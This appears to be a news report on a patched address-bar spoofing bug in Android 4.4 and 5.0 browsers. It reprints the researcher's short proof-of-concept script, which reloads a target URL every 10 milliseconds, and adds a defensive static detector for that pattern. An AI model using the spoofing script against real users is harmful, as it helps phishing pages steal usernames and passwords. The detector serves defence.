The bug was dangerous because it allowed the browser's address bar to be spoofed. That can be enough to convince a victim of a phishing email or text message to enter their usernames and passwords.
The bug was patched in early April and then again later in April. It affected Android 4.4 "KitKat" and Android 5.0 "Lollipop."
"The code is hilariously simple to understand: the webpage reloads roughly every 10 milliseconds (random) using the setInterval() function, just before the browser can get the real page, and so the user sees the ‘real’ web address instead of the fake one," Paulos explains about the code.

<script>
function f() {
  // Navigate to the target URL; the random query string makes every request unique.
  location="http://www.dailymail.co.uk/home/index.html?random="+Math.random();
}
// Call f() again every 10 milliseconds.
setInterval("f()",10);
</script>
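For reviewing page scripts for the pattern described above, a short-interval timer whose callback navigates the page can be flagged with a simple static check. This is an added example, not code from the original article or from the researchers; the function names, the 100 ms threshold and the sample strings are assumptions made for illustration.

```javascript
// Added example: a static heuristic, not a full JavaScript parser.
// It only handles named callbacks passed to setInterval as a reference or a "name()" string.
const NAVIGATION =
  /\b(?:window\.|document\.)?location(?:\.href)?\s*=(?!=)|\blocation\.(?:replace|assign)\s*\(/;

// Return the body of `function name(...) { ... }` using brace matching, or null.
function functionBody(source, name) {
  const safe = name.replace(/\$/g, "\\$");
  const head = new RegExp("function\\s+" + safe + "\\s*\\([^)]*\\)\\s*\\{").exec(source);
  if (!head) return null;
  const start = head.index + head[0].length;
  let depth = 1;
  let i = start;
  for (; i < source.length && depth > 0; i++) {
    if (source[i] === "{") depth++;
    else if (source[i] === "}") depth--;
  }
  return depth === 0 ? source.slice(start, i - 1) : null;
}

// Flag setInterval(callback, delay) where delay <= maxDelayMs and the callback navigates.
function findRapidReloadLoops(source, maxDelayMs = 100) {
  const timer =
    /setInterval\s*\(\s*(?:(["'])\s*([A-Za-z_$][\w$]*)\s*\(\s*\)\s*;?\s*\1|([A-Za-z_$][\w$]*))\s*,\s*(\d+)\s*\)/g;
  const findings = [];
  for (const m of source.matchAll(timer)) {
    const name = m[2] || m[3];
    const delayMs = Number(m[4]);
    const body = functionBody(source, name);
    if (body !== null && delayMs <= maxDelayMs && NAVIGATION.test(body)) {
      findings.push({ callback: name, delayMs });
    }
  }
  return findings;
}

// Constructed sample inputs (placeholder domain, not real pages).
const SAMPLE_SPOOF =
  'function f() { location = "https://real-site.example/?r=" + Math.random(); } setInterval("f()", 10);';
const SAMPLE_BENIGN =
  "function tick() { clock.textContent = Date.now(); } setInterval(tick, 10);";

console.log(findRapidReloadLoops(SAMPLE_SPOOF));  // one finding
console.log(findRapidReloadLoops(SAMPLE_BENIGN)); // no findings
```

A match is a reason to inspect the page, not a verdict: inline or obfuscated callbacks are not covered by this heuristic.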